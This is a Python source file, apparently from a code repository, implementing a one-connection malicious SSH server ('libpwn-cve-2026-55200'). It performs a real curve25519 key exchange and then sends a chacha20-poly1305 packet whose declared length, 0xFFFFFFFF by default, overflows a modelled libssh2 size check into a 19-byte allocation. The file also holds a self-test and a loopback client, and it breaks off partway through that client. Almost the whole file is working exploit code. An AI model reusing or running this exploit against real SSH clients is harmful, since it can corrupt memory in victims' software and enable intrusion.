634 lines
23 KiB
Python
634 lines
23 KiB
Python
#!/usr/bin/env python3
|
|
import argparse
|
|
import hashlib
|
|
import os
|
|
import queue
|
|
import socket
|
|
import struct
|
|
import sys
|
|
import threading
|
|
import time
|
|
import traceback
|
|
from dataclasses import dataclass
|
|
|
|
from cryptography.hazmat.primitives import hashes, serialization
|
|
from cryptography.hazmat.primitives.asymmetric import padding, rsa, x25519
|
|
|
|
|
|
# Listen address defaults. Deliberately empty/zero: main() refuses --serve
# until --listen-host and --listen-port are given explicitly.
HOST = ""
PORT = 0

# Identification strings (RFC 4253 section 4.2) for the server and the
# in-process loopback client.
SERVER_IDENT = b"SSH-2.0-libpwn-cve-2026-55200"
CLIENT_IDENT = b"SSH-2.0-libpwn-local-libssh2-mock"

# Upper bound on the computed total used by the modelled length check
# (see model_vulnerable_c_expression).
LIBSSH2_PACKET_MAXPAYLOAD = 35000
# Default --packet-length written into the trigger packet's length field.
DEFAULT_PACKET_LENGTH = 0xFFFFFFFF
# 16 = length of the Poly1305 tag appended by chachapoly_encrypt.
DEFAULT_AUTH_LEN = 16
# No separate MAC is computed anywhere in this file.
DEFAULT_MAC_LEN = 0

# Algorithm name-lists advertised in SSH_MSG_KEXINIT and matched against the
# peer's lists during negotiation.
KEX_ALGORITHMS = ["curve25519-sha256", "curve25519-sha256@libssh.org"]
HOSTKEY_ALGORITHMS = ["rsa-sha2-256", "ssh-rsa"]
CIPHER_ALGORITHMS = ["chacha20-poly1305@openssh.com"]
# Advertised and checked during negotiation only; the chacha20-poly1305
# cipher carries its own tag, so no HMAC is ever computed here.
MAC_ALGORITHMS = ["hmac-sha2-256", "hmac-sha1"]
COMP_ALGORITHMS = ["none"]
|
|
|
|
|
|
def u32(value):
    """Encode *value* as an SSH uint32 (4 bytes, big-endian).

    The value is reduced modulo 2**32 first, so negative or oversized
    integers wrap instead of raising.
    """
    wrapped = value & 0xFFFFFFFF
    return struct.pack(">I", wrapped)
|
|
|
|
|
|
def read_exact(sock, size):
    """Receive exactly *size* bytes from *sock* and return them as ``bytes``.

    ``sock.recv`` is called repeatedly until enough data has arrived. A
    non-positive *size* returns ``b""`` without reading.

    Raises:
        EOFError: if the peer closes the connection (``recv`` returns an
            empty result) before *size* bytes have been received.
    """
    pieces = []
    received = 0
    while received < size:
        piece = sock.recv(size - received)
        if not piece:
            raise EOFError("connection closed while reading")
        pieces.append(piece)
        received += len(piece)
    return b"".join(pieces)
|
|
|
|
|
|
def ssh_string(data):
    """Encode *data* as an SSH ``string``: uint32 length prefix followed by the bytes.

    ``str`` input is encoded with ``str.encode()`` (UTF-8) before framing.
    """
    payload = data.encode() if isinstance(data, str) else data
    return u32(len(payload)) + payload
|
|
|
|
|
|
def ssh_name_list(items):
    """Encode an iterable of algorithm names as an SSH ``name-list`` (comma-joined string)."""
    joined = ",".join(items)
    return ssh_string(joined)
|
|
|
|
|
|
def mpint_bytes(value):
    """Return the body of an SSH ``mpint`` for a non-negative integer (no length prefix).

    Zero encodes as the empty string. Otherwise the minimal big-endian
    representation is used, with a leading ``0x00`` added when the top bit
    is set so that the value is not read as negative.
    """
    if value == 0:
        return b""
    width = (value.bit_length() + 7) // 8
    encoded = value.to_bytes(width, "big")
    return b"\x00" + encoded if encoded[0] >= 0x80 else encoded
|
|
|
|
|
|
def ssh_mpint(value):
    """Encode a non-negative integer as a length-prefixed SSH ``mpint``."""
    body = mpint_bytes(value)
    return ssh_string(body)
|
|
|
|
|
|
def read_ssh_string(buf, offset):
    """Decode one SSH ``string`` from *buf* starting at *offset*.

    Returns:
        tuple: ``(body, next_offset)`` where *next_offset* points just past
        the decoded string.

    Raises:
        ValueError: if fewer than 4 bytes remain for the length prefix, or
            the declared body extends past the end of *buf*.
    """
    body_start = offset + 4
    if body_start > len(buf):
        raise ValueError("short SSH string length")
    (length,) = struct.unpack(">I", buf[offset:body_start])
    body_end = body_start + length
    if body_end > len(buf):
        raise ValueError("short SSH string body")
    return buf[body_start:body_end], body_end
|
|
|
|
|
|
def split_namelist(raw):
    """Split a raw SSH name-list into a list of names.

    Empty or falsy input yields ``[]``. Bytes are decoded strictly
    (UTF-8), so invalid encodings raise ``UnicodeDecodeError``.
    """
    return raw.decode(errors="strict").split(",") if raw else []
|
|
|
|
|
|
def first_match(client_items, server_items, label):
    """Return the first name in *client_items* that also appears in *server_items*.

    The client's preference order wins (RFC 4253 section 7.1 negotiation).

    Raises:
        RuntimeError: when no client name is supported; *label* names the
            category in the message.
    """
    not_found = object()
    chosen = next((name for name in client_items if name in server_items), not_found)
    if chosen is not_found:
        raise RuntimeError(f"client did not offer required {label}; got {client_items!r}")
    return chosen
|
|
|
|
|
|
def build_plain_packet(payload, block_size=8):
    """Frame *payload* as an unencrypted SSH binary packet (RFC 4253 section 6).

    Layout: uint32 packet_length, byte padding_length, payload, random padding.
    Padding is chosen so the whole packet is a multiple of *block_size*, with
    at least 4 padding bytes.
    """
    overhead = len(payload) + 5  # 4-byte length field + 1-byte padding_length
    pad = -overhead % block_size
    if pad < 4:
        pad += block_size
    length_field = u32(len(payload) + 1 + pad)
    return length_field + bytes((pad,)) + payload + os.urandom(pad)
|
|
|
|
|
|
def parse_plain_packet(packet):
    """Validate a complete unencrypted SSH packet and return its payload.

    *packet* must contain the 4-byte length field, the padding_length byte,
    the payload and the padding, and nothing more.

    Raises:
        ValueError: if the packet is shorter than 5 bytes, its declared
            length does not match the buffer, or padding_length leaves no
            room for the padding_length byte itself.
    """
    if len(packet) < 5:
        raise ValueError("plain packet too short")
    declared, pad = struct.unpack(">IB", packet[:5])
    if declared + 4 != len(packet):
        raise ValueError("packet length mismatch")
    if pad >= declared:
        raise ValueError("invalid padding length")
    payload_end = 4 + declared - pad
    return packet[5:payload_end]
|
|
|
|
|
|
def read_plain_packet(sock, max_packet=1024 * 1024):
    """Read one unencrypted SSH packet from *sock* and return its payload.

    Raises:
        ValueError: if the declared packet_length is 0 or exceeds
            *max_packet*, or if the packet fails parse_plain_packet checks.
        EOFError: if the connection closes mid-packet.
    """
    header = read_exact(sock, 4)
    (declared_len,) = struct.unpack(">I", header)
    if not 1 <= declared_len <= max_packet:
        raise ValueError(f"refusing plain packet_length={declared_len}")
    return parse_plain_packet(header + read_exact(sock, declared_len))
|
|
|
|
|
|
def send_plain_packet(sock, payload):
    """Frame *payload* as an unencrypted SSH packet and send all of it on *sock*."""
    framed = build_plain_packet(payload)
    sock.sendall(framed)
|
|
|
|
|
|
def read_ident(sock):
    """Read lines from *sock* until one starts with ``SSH-`` and return it.

    Lines end at ``\\n``; a trailing ``\\r`` is stripped. Lines that do not
    start with ``SSH-`` (pre-banner text) are discarded.

    Raises:
        ValueError: if any line grows beyond 4096 bytes.
        EOFError: if the connection closes first.
    """
    line = bytearray()
    while True:
        byte = read_exact(sock, 1)
        if byte != b"\n":
            line += byte
            if len(line) > 4096:
                raise ValueError("SSH banner line too long")
            continue
        candidate = bytes(line).rstrip(b"\r")
        if candidate.startswith(b"SSH-"):
            return candidate
        line.clear()
|
|
|
|
|
|
def build_kexinit_payload():
    """Build an SSH_MSG_KEXINIT payload advertising this module's algorithm lists.

    Layout: byte 20, 16-byte random cookie, ten name-lists (kex, host key,
    cipher c2s/s2c, MAC c2s/s2c, compression c2s/s2c, two empty language
    lists), first_kex_packet_follows = 0, reserved uint32 = 0.
    """
    directional_lists = (
        KEX_ALGORITHMS,
        HOSTKEY_ALGORITHMS,
        CIPHER_ALGORITHMS, CIPHER_ALGORITHMS,
        MAC_ALGORITHMS, MAC_ALGORITHMS,
        COMP_ALGORITHMS, COMP_ALGORITHMS,
    )
    parts = [b"\x14", os.urandom(16)]
    parts.extend(ssh_name_list(names) for names in directional_lists)
    parts += [ssh_string(b""), ssh_string(b""), b"\x00", u32(0)]
    return b"".join(parts)
|
|
|
|
|
|
def parse_kexinit_payload(payload):
    """Parse an SSH_MSG_KEXINIT payload into its algorithm name-lists.

    All ten name-lists after the 16-byte cookie are decoded, so malformed
    lengths raise. Only the first eight are returned; the two language lists,
    first_kex_packet_follows and the reserved field are not inspected.

    Returns:
        dict: keys kex, hostkey, c2s_cipher, s2c_cipher, c2s_mac, s2c_mac,
        c2s_comp, s2c_comp, each mapped to a list of names.

    Raises:
        ValueError: if the message byte is not 20 or a name-list is truncated.
    """
    if not payload or payload[0] != 20:
        raise ValueError("expected SSH_MSG_KEXINIT")
    field_names = (
        "kex", "hostkey",
        "c2s_cipher", "s2c_cipher",
        "c2s_mac", "s2c_mac",
        "c2s_comp", "s2c_comp",
    )
    cursor = 17  # 1 message byte + 16-byte cookie
    decoded = []
    for _ in range(10):
        raw, cursor = read_ssh_string(payload, cursor)
        decoded.append(split_namelist(raw))
    return dict(zip(field_names, decoded))
|
|
|
|
|
|
def rsa_public_blob(private_key, algorithm):
    """Encode the RSA host public key as an SSH public-key blob.

    Layout: string key-type || mpint e || mpint n (RFC 4253 section 6.6).

    RFC 8332 section 3 keeps the key-type inside the blob as "ssh-rsa" even
    when the negotiated host-key signature algorithm is rsa-sha2-256 or
    rsa-sha2-512. Only the signature blob (see sign_exchange_hash) carries the
    SHA-2 algorithm name, so those names are mapped back to "ssh-rsa" here.

    Args:
        private_key: RSA private key object; only its public numbers are used.
        algorithm: negotiated host-key algorithm name. RSA signature names
            ("ssh-rsa", "rsa-sha2-256", "rsa-sha2-512") become "ssh-rsa";
            any other value is written unchanged.

    Returns:
        bytes: the encoded blob, without an outer length prefix.
    """
    rsa_signature_names = ("ssh-rsa", "rsa-sha2-256", "rsa-sha2-512")
    key_type = "ssh-rsa" if algorithm in rsa_signature_names else algorithm
    numbers = private_key.public_key().public_numbers()
    return ssh_string(key_type) + ssh_mpint(numbers.e) + ssh_mpint(numbers.n)
|
|
|
|
|
|
def sign_exchange_hash(private_key, hostkey_algorithm, exchange_hash):
    """Sign the exchange hash with the RSA host key and wrap it as an SSH signature blob.

    Uses PKCS#1 v1.5 padding with SHA-256 for "rsa-sha2-256" and SHA-1 for
    "ssh-rsa".

    Returns:
        bytes: string(hostkey_algorithm) || string(signature).

    Raises:
        ValueError: for any other *hostkey_algorithm*.
    """
    for name, digest_cls in (("rsa-sha2-256", hashes.SHA256), ("ssh-rsa", hashes.SHA1)):
        if hostkey_algorithm == name:
            break
    else:
        raise ValueError(f"unsupported hostkey signature algorithm {hostkey_algorithm}")
    signature = private_key.sign(exchange_hash, padding.PKCS1v15(), digest_cls())
    return ssh_string(hostkey_algorithm) + ssh_string(signature)
|
|
|
|
|
|
def exchange_hash(client_ident, server_ident, client_kexinit, server_kexinit,
                  hostkey_blob, client_pub, server_pub, shared_int):
    """Compute the curve25519-sha256 exchange hash H (RFC 8731 / RFC 5656 section 4).

    H = SHA-256(string V_C || string V_S || string I_C || string I_S ||
    string K_S || string Q_C || string Q_S || mpint K).
    """
    framed_fields = (
        client_ident, server_ident,
        client_kexinit, server_kexinit,
        hostkey_blob,
        client_pub, server_pub,
    )
    transcript = b"".join(ssh_string(field) for field in framed_fields) + ssh_mpint(shared_int)
    return hashlib.sha256(transcript).digest()
|
|
|
|
|
|
def derive_key(shared_int, exchange_hash_value, session_id, letter, length):
    """Derive *length* bytes of key material per RFC 4253 section 7.2 using SHA-256.

    K1 = HASH(K || H || letter || session_id); further blocks are
    HASH(K || H || K1 || K2 ...) until enough bytes exist. K is the shared
    secret encoded as an mpint; *letter* is a one-byte ``bytes`` such as b"D".
    """
    secret = ssh_mpint(shared_int)
    material = hashlib.sha256(secret + exchange_hash_value + letter + session_id).digest()
    while len(material) < length:
        material += hashlib.sha256(secret + exchange_hash_value + material).digest()
    return material[:length]
|
|
|
|
|
|
def rotl32(value, shift):
    """Rotate a 32-bit *value* left by *shift* bits (0 < shift < 32 expected)."""
    high = (value << shift) & 0xFFFFFFFF
    low = value >> (32 - shift)
    return high | low
|
|
|
|
|
|
def quarter_round(state, a, b, c, d):
    """Apply one ChaCha quarter-round in place to the words at indices a, b, c, d.

    Each step adds one word into another (mod 2**32), XORs the result into a
    third word and rotates it left. The four steps are, in order:
    (a += b, d rot 16), (c += d, b rot 12), (a += b, d rot 8), (c += d, b rot 7),
    as in RFC 8439 section 2.1.
    """
    steps = ((a, b, d, 16), (c, d, b, 12), (a, b, d, 8), (c, d, b, 7))
    for target, addend, rotated, distance in steps:
        state[target] = (state[target] + state[addend]) & 0xFFFFFFFF
        state[rotated] = rotl32(state[rotated] ^ state[target], distance)
|
|
|
|
|
|
def chacha20_block(key, counter, nonce8):
    """Return one 64-byte ChaCha20 keystream block (20 rounds).

    Uses the original ChaCha layout: 4 constant words, 8 key words, a
    64-bit block counter split into two little-endian 32-bit words, and an
    8-byte nonce as two words.
    """
    def words(blob, count):
        # Little-endian 32-bit words taken from consecutive 4-byte slices.
        return [int.from_bytes(blob[4 * i:4 * i + 4], "little") for i in range(count)]

    initial = words(b"expand 32-byte k", 4) + words(key, 8)
    initial.extend((
        counter & 0xFFFFFFFF,
        (counter >> 32) & 0xFFFFFFFF,
        int.from_bytes(nonce8[:4], "little"),
        int.from_bytes(nonce8[4:], "little"),
    ))

    column_quads = ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15))
    diagonal_quads = ((0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14))
    mixed = list(initial)
    for _ in range(10):  # 10 double rounds = 20 rounds
        for quad in column_quads + diagonal_quads:
            quarter_round(mixed, *quad)

    return b"".join(
        ((m + s) & 0xFFFFFFFF).to_bytes(4, "little") for m, s in zip(mixed, initial)
    )
|
|
|
|
|
|
def chacha20_xor(key, counter, nonce8, data):
    """XOR *data* with the ChaCha20 keystream starting at block *counter*.

    One keystream block is generated per 64-byte slice of *data*. The block
    counter advances by one per slice and wraps at 2**64. Encryption and
    decryption are the same operation.
    """
    pieces = []
    for index, start in enumerate(range(0, len(data), 64)):
        keystream = chacha20_block(key, (counter + index) & 0xFFFFFFFFFFFFFFFF, nonce8)
        segment = data[start:start + 64]
        pieces.append(bytes(x ^ y for x, y in zip(segment, keystream)))
    return b"".join(pieces)
|
|
|
|
|
|
def poly1305_mac(message, key):
    """Compute the 16-byte Poly1305 tag of *message* under a 32-byte one-time *key*.

    The first 16 key bytes are r (clamped), the last 16 are s. Each 16-byte
    chunk (the last may be shorter) gets a 0x01 byte appended, is read
    little-endian, and is folded into the accumulator modulo 2**130 - 5
    (RFC 8439 section 2.5).
    """
    prime = (1 << 130) - 5
    r = int.from_bytes(key[:16], "little") & 0x0FFFFFFC0FFFFFFC0FFFFFFC0FFFFFFF
    s = int.from_bytes(key[16:], "little")
    accumulator = 0
    for start in range(0, len(message), 16):
        chunk = message[start:start + 16]
        accumulator = (accumulator + int.from_bytes(chunk + b"\x01", "little")) * r % prime
    tag = (accumulator + s) % (1 << 128)
    return tag.to_bytes(16, "little")
|
|
|
|
|
|
def chachapoly_encrypt(key64, seqno, plaintext_without_tag):
    """Encrypt one SSH packet with chacha20-poly1305@openssh.com and append its tag.

    Args:
        key64: 64-byte key. Bytes 0-31 encrypt the packet body; bytes 32-63
            encrypt the 4-byte packet_length field.
        seqno: SSH packet sequence number, used as the 8-byte big-endian nonce.
        plaintext_without_tag: 4-byte packet_length followed by the rest of
            the packet.

    Returns:
        bytes: ciphertext followed by a 16-byte Poly1305 tag over that ciphertext.

    Raises:
        ValueError: for a key that is not 64 bytes or a plaintext under 4 bytes.
    """
    if len(key64) != 64:
        raise ValueError("chacha20-poly1305@openssh.com requires a 64-byte key")
    if len(plaintext_without_tag) < 4:
        raise ValueError("packet needs a 4-byte SSH packet_length")
    nonce = seqno.to_bytes(8, "big")
    body_key, length_key = key64[:32], key64[32:]
    length_field, body = plaintext_without_tag[:4], plaintext_without_tag[4:]
    ciphertext = (
        chacha20_xor(length_key, 0, nonce, length_field)
        + chacha20_xor(body_key, 1, nonce, body)
    )
    # Poly1305 one-time key = first 32 bytes of the body key's keystream block 0.
    one_time_key = chacha20_xor(body_key, 0, nonce, bytes(64))[:32]
    return ciphertext + poly1305_mac(ciphertext, one_time_key)
|
|
|
|
|
|
def chachapoly_decrypt(key64, seqno, encrypted_with_tag):
    """Verify and decrypt one chacha20-poly1305@openssh.com packet.

    This is the inverse of chachapoly_encrypt. The Poly1305 tag is checked
    before anything is decrypted.

    Args:
        key64: 64-byte key. Bytes 0-31 are for the body; bytes 32-63 are for
            the length field.
        seqno: SSH packet sequence number (8-byte big-endian nonce).
        encrypted_with_tag: ciphertext (at least the 4-byte length field)
            followed by a 16-byte tag.

    Returns:
        bytes: decrypted packet_length field followed by the decrypted body.

    Raises:
        ValueError: if the input is shorter than 20 bytes, the key is not
            64 bytes (the same check chachapoly_encrypt makes), or the tag
            does not verify.
    """
    import hmac  # local import: compare_digest for a timing-safe tag check

    if len(encrypted_with_tag) < 20:
        raise ValueError("encrypted packet too short")
    if len(key64) != 64:
        raise ValueError("chacha20-poly1305@openssh.com requires a 64-byte key")
    seq = seqno.to_bytes(8, "big")
    main_key = key64[:32]
    header_key = key64[32:]
    encrypted = encrypted_with_tag[:-16]
    tag = encrypted_with_tag[-16:]
    poly_key = chacha20_xor(main_key, 0, seq, b"\x00" * 64)[:32]
    expected = poly1305_mac(encrypted, poly_key)
    if not hmac.compare_digest(expected, tag):
        raise ValueError("poly1305 tag mismatch")
    packet_len = chacha20_xor(header_key, 0, seq, encrypted[:4])
    body = chacha20_xor(main_key, 1, seq, encrypted[4:])
    return packet_len + body
|
|
|
|
|
|
def build_malformed_plain(packet_length, body_len):
    """Build a plaintext packet whose length field does not match its contents.

    The result is uint32(*packet_length*), then a padding_length byte of 4,
    then ``body_len - 1`` bytes of b"A". Only *body_len* bytes follow the
    length field, whatever *packet_length* declares.

    Raises:
        ValueError: if *body_len* < 1 (there would be no padding_length byte).
    """
    if body_len < 1:
        raise ValueError("body_len must be at least 1 so padding_length exists")
    filler = b"A" * (body_len - 1)
    return b"".join((u32(packet_length), b"\x04", filler))
|
|
|
|
|
|
def build_malformed_wire(key64, seqno, packet_length, body_len, filler_len):
    """Return the on-the-wire trigger bytes.

    This is the build_malformed_plain packet encrypted and tagged with
    chacha20-poly1305 for *seqno*, followed by *filler_len* unencrypted
    b"B" bytes.
    """
    sealed = chachapoly_encrypt(key64, seqno, build_malformed_plain(packet_length, body_len))
    trailing = b"B" * filler_len
    return sealed + trailing
|
|
|
|
|
|
@dataclass
class ArithmeticResult:
    """Outcome of modelling the packet-length arithmetic for one packet_length.

    The model functions build it positionally, so field order matters.
    """

    # True when the modelled 32-bit total passes the 0 < total <= max check.
    accepted: bool
    # 4 + packet_length + mac_len + auth_len, reduced modulo 2**32.
    total32: int
    # total32 when accepted, otherwise 0.
    allocation: int
    # True when packet_length alone exceeds LIBSSH2_PACKET_MAXPAYLOAD.
    fixed_rejects: bool
    # (packet_length - 1) modulo 2**32.
    fullpacket_copy_len: int
    # fullpacket_copy_len - total32 when accepted and larger, else 0.
    gap: int
|
|
|
|
|
|
def model_vulnerable_c_expression(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN):
    """Model a 32-bit ``4 + (packet_length + mac_len + auth_len)`` size check.

    Both additions wrap modulo 2**32. The check accepts when
    packet_length >= 1 and 0 < total <= LIBSSH2_PACKET_MAXPAYLOAD. The
    "fixed" comparison rejects any packet_length above that maximum.

    Returns:
        ArithmeticResult: see its field comments.
    """
    mask = 0xFFFFFFFF
    inner = (packet_length + mac_len + auth_len) & mask
    total = (inner + 4) & mask
    ok = packet_length >= 1 and 0 < total <= LIBSSH2_PACKET_MAXPAYLOAD
    copy_len = (packet_length - 1) & mask
    return ArithmeticResult(
        accepted=ok,
        total32=total,
        allocation=total if ok else 0,
        fixed_rejects=packet_length > LIBSSH2_PACKET_MAXPAYLOAD,
        fullpacket_copy_len=copy_len,
        gap=copy_len - total if (ok and copy_len > total) else 0,
    )
|
|
|
|
|
|
def model_vulnerable32(packet_length, mac_len=DEFAULT_MAC_LEN, auth_len=DEFAULT_AUTH_LEN):
    """Model the size check with the whole sum wrapped once modulo 2**32.

    ``(4 + p + m + a) mod 2**32`` equals ``(4 + ((p + m + a) mod 2**32)) mod 2**32``
    for all integers, so every field of the result is identical to
    model_vulnerable_c_expression. The previous copy-pasted body is replaced
    by delegation so the two models cannot drift apart.

    Returns:
        ArithmeticResult: same value model_vulnerable_c_expression returns.
    """
    return model_vulnerable_c_expression(packet_length, mac_len, auth_len)
|
|
|
|
|
|
class MiniSSHExploitServer:
    """Single-connection SSH server that completes a curve25519 key exchange
    and then sends one malformed chacha20-poly1305 packet.

    Only the handshake steps needed to reach encrypted transport exist here;
    there is no user authentication or channel handling.
    """

    def __init__(self, args):
        # args: parsed argparse namespace from main(). Attributes read by this
        # class: listen_host, listen_port, timeout, packet_length, body_len,
        # filler_len, hold_open.
        self.args = args
        # Fresh 2048-bit RSA host key per instance; never persisted, so the
        # host key differs on every run.
        self.host_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    def serve_once(self):
        """Bind, accept exactly one TCP client, run handle_client on it, then return."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((self.args.listen_host, self.args.listen_port))
            listener.listen(1)
            actual_host, actual_port = listener.getsockname()
            print(f"[+] listening on {actual_host}:{actual_port}")
            conn, addr = listener.accept()
            with conn:
                # The same timeout applies to every blocking read in the handshake.
                conn.settimeout(self.args.timeout)
                print(f"[+] client connected from {addr[0]}:{addr[1]}")
                self.handle_client(conn)

    def handle_client(self, conn):
        """Run the server side of the handshake on *conn*, then send the trigger packet.

        Raises RuntimeError/ValueError/EOFError when the client deviates from
        the expected curve25519 + chacha20-poly1305 negotiation.
        """
        # Per-direction packet counters. seq_out is the server's sequence
        # number and becomes the chacha20-poly1305 nonce for the trigger;
        # seq_in is incremented but not otherwise read.
        seq_out = 0
        seq_in = 0

        # Identification exchange.
        conn.sendall(SERVER_IDENT + b"\r\n")
        client_ident = read_ident(conn)
        print(f"[+] client ident: {client_ident.decode(errors='replace')}")

        # Client SSH_MSG_KEXINIT (message 20) is read before the server sends its own.
        client_kexinit = read_plain_packet(conn)
        seq_in += 1
        client_lists = parse_kexinit_payload(client_kexinit)

        # Negotiation: every category must overlap with this server's lists.
        # Only kex and host-key results are kept; each of the other categories
        # has a single acceptable outcome or is unused.
        chosen_kex = first_match(client_lists["kex"], KEX_ALGORITHMS, "kex")
        chosen_hostkey = first_match(client_lists["hostkey"], HOSTKEY_ALGORITHMS, "hostkey")
        first_match(client_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server-to-client cipher")
        first_match(client_lists["c2s_cipher"], CIPHER_ALGORITHMS, "client-to-server cipher")
        first_match(client_lists["s2c_mac"], MAC_ALGORITHMS, "server-to-client mac")
        first_match(client_lists["c2s_mac"], MAC_ALGORITHMS, "client-to-server mac")
        first_match(client_lists["s2c_comp"], COMP_ALGORITHMS, "server-to-client compression")
        first_match(client_lists["c2s_comp"], COMP_ALGORITHMS, "client-to-server compression")
        print(f"[+] negotiated {chosen_kex} / {chosen_hostkey} / chacha20-poly1305@openssh.com")

        # Server KEXINIT; the exact bytes sent are kept for the exchange hash.
        server_kexinit = build_kexinit_payload()
        send_plain_packet(conn, server_kexinit)
        seq_out += 1

        # SSH_MSG_KEX_ECDH_INIT (message 30): exactly one 32-byte string, Q_C.
        init_payload = read_plain_packet(conn)
        seq_in += 1
        if not init_payload or init_payload[0] != 30:
            raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_INIT, got {init_payload[:1]!r}")
        client_pub, offset = read_ssh_string(init_payload, 1)
        if offset != len(init_payload) or len(client_pub) != 32:
            raise RuntimeError("invalid curve25519 client public key")

        # Ephemeral X25519 key pair and shared secret K.
        server_private = x25519.X25519PrivateKey.generate()
        server_pub = server_private.public_key().public_bytes(
            serialization.Encoding.Raw,
            serialization.PublicFormat.Raw,
        )
        shared = server_private.exchange(x25519.X25519PublicKey.from_public_bytes(client_pub))
        if shared == b"\x00" * 32:
            raise RuntimeError("invalid all-zero curve25519 shared secret")
        # K is the 32-byte shared value read as a big-endian unsigned integer.
        shared_int = int.from_bytes(shared, "big")

        # Exchange hash H; the first H of a connection is also the session id.
        hostkey_blob = rsa_public_blob(self.host_key, chosen_hostkey)
        h = exchange_hash(client_ident, SERVER_IDENT, client_kexinit, server_kexinit,
                          hostkey_blob, client_pub, server_pub, shared_int)
        session_id = h
        signature = sign_exchange_hash(self.host_key, chosen_hostkey, h)

        # SSH_MSG_KEX_ECDH_REPLY (0x1f = 31): K_S, Q_S, signature over H.
        reply = b"\x1f" + ssh_string(hostkey_blob) + ssh_string(server_pub) + ssh_string(signature)
        send_plain_packet(conn, reply)
        seq_out += 1

        # SSH_MSG_NEWKEYS (0x15 = 21): after this the server's outgoing
        # packets use the new keys.
        send_plain_packet(conn, b"\x15")
        seq_out += 1
        print("[+] sent SSH_MSG_NEWKEYS")

        # Best-effort read of the client's NEWKEYS: any failure or unexpected
        # message is only logged, and the trigger is sent regardless.
        try:
            newkeys = read_plain_packet(conn)
            seq_in += 1
            if newkeys != b"\x15":
                print(f"[!] expected client NEWKEYS, got {newkeys[:1]!r}; continuing")
            else:
                print("[+] received client SSH_MSG_NEWKEYS")
        except Exception as exc:
            print(f"[!] did not read client NEWKEYS before trigger: {exc}")

        # Server-to-client encryption key (letter "D", RFC 4253 section 7.2).
        # 64 bytes because chachapoly_encrypt requires two 256-bit keys.
        key_s2c = derive_key(shared_int, h, session_id, b"D", 64)
        # Three packets were sent so far (KEXINIT, REPLY, NEWKEYS), so this is 3.
        trigger_seq = seq_out
        # Encrypted packet whose length field is --packet-length but whose body
        # is only --body-len bytes, followed by --filler-len unencrypted bytes.
        wire = build_malformed_wire(
            key_s2c,
            trigger_seq,
            self.args.packet_length,
            self.args.body_len,
            self.args.filler_len,
        )
        conn.sendall(wire)
        print(f"[+] sent malformed chacha/poly1305 trigger at server seq={trigger_seq}")
        print(f"[+] trigger bytes={len(wire)} packet_length=0x{self.args.packet_length:08x}")
        # Keep the connection open for --hold-open seconds before the caller
        # closes it, giving the client time to process the packet.
        time.sleep(self.args.hold_open)
|
|
|
|
|
|
def self_test(args):
    """Offline check of the trigger generator and the length-arithmetic model.

    Encrypts a trigger with a fixed key (bytes 0..63) at sequence number 3,
    strips the filler, decrypts it back, and prints a report. The checks
    require the decrypted length field to equal --packet-length, the modelled
    32-bit check to accept with an allocation of 19, and the fixed model to
    reject. Raises SystemExit with a FAIL message otherwise.
    """
    fixed_key = bytes(range(64))
    seq = 3
    wire = build_malformed_wire(fixed_key, seq, args.packet_length, args.body_len, args.filler_len)
    fragment = wire[:-args.filler_len] if args.filler_len else wire
    plain = chachapoly_decrypt(fixed_key, seq, fragment)
    (roundtrip_len,) = struct.unpack(">I", plain[:4])
    model = model_vulnerable_c_expression(args.packet_length, DEFAULT_MAC_LEN, DEFAULT_AUTH_LEN)

    report = (
        "[self-test] chacha20-poly1305@openssh.com packet generator",
        f"packet_length=0x{roundtrip_len:08x} ({roundtrip_len})",
        f"encrypted_fragment_len={len(fragment)}",
        f"filler_len={args.filler_len}",
        f"body_len={args.body_len}",
        f"vulnerable_c_expression_accepted={model.accepted}",
        f"vulnerable_c_expression_allocation={model.allocation}",
        f"fixed_rejects={model.fixed_rejects}",
        f"fullpacket_style_length={model.fullpacket_copy_len}",
        f"allocation_gap={model.gap}",
    )
    for line in report:
        print(line)

    checks = (
        (roundtrip_len == args.packet_length,
         "[self-test] FAIL: decrypted packet_length mismatch"),
        (model.accepted and model.allocation == 19,
         "[self-test] FAIL: arithmetic did not reach wrapped allocation=19"),
        (model.fixed_rejects,
         "[self-test] FAIL: fixed model did not reject oversized length"),
    )
    for passed, failure in checks:
        if not passed:
            raise SystemExit(failure)
    print("[self-test] PASS")
|
|
|
|
|
|
def loopback_client(client_sock, args):
    """Client half of the loopback test: run the handshake and decrypt the trigger.

    Mirrors MiniSSHExploitServer.handle_client over *client_sock*. It does not
    verify the host-key signature. It then reads the encrypted trigger fragment
    plus filler and checks that the decrypted length field equals
    --packet-length.

    Returns:
        tuple: (decoded packet_length, number of encrypted bytes read).

    Raises:
        RuntimeError, ValueError or EOFError on any protocol deviation.
    """
    client_sock.settimeout(args.timeout)
    server_ident = read_ident(client_sock)
    if server_ident != SERVER_IDENT:
        raise RuntimeError(f"unexpected server ident {server_ident!r}")
    client_sock.sendall(CLIENT_IDENT + b"\r\n")

    # Client KEXINIT; the exact bytes sent are needed for the exchange hash.
    client_kexinit = build_kexinit_payload()
    send_plain_packet(client_sock, client_kexinit)

    server_kexinit = read_plain_packet(client_sock)
    server_lists = parse_kexinit_payload(server_kexinit)
    first_match(server_lists["kex"], KEX_ALGORITHMS, "server kex")
    first_match(server_lists["hostkey"], HOSTKEY_ALGORITHMS, "server hostkey")
    first_match(server_lists["s2c_cipher"], CIPHER_ALGORITHMS, "server cipher")

    # SSH_MSG_KEX_ECDH_INIT (0x1e = 30) carrying the client's X25519 public key.
    client_private = x25519.X25519PrivateKey.generate()
    client_pub = client_private.public_key().public_bytes(
        serialization.Encoding.Raw,
        serialization.PublicFormat.Raw,
    )
    send_plain_packet(client_sock, b"\x1e" + ssh_string(client_pub))

    # SSH_MSG_KEX_ECDH_REPLY (31): host-key blob, server public key, signature.
    reply = read_plain_packet(client_sock)
    if not reply or reply[0] != 31:
        raise RuntimeError(f"expected SSH_MSG_KEX_ECDH_REPLY, got {reply[:1]!r}")
    hostkey_blob, offset = read_ssh_string(reply, 1)
    server_pub, offset = read_ssh_string(reply, offset)
    # Signature is parsed only to enforce framing; it is never verified here.
    _signature, offset = read_ssh_string(reply, offset)
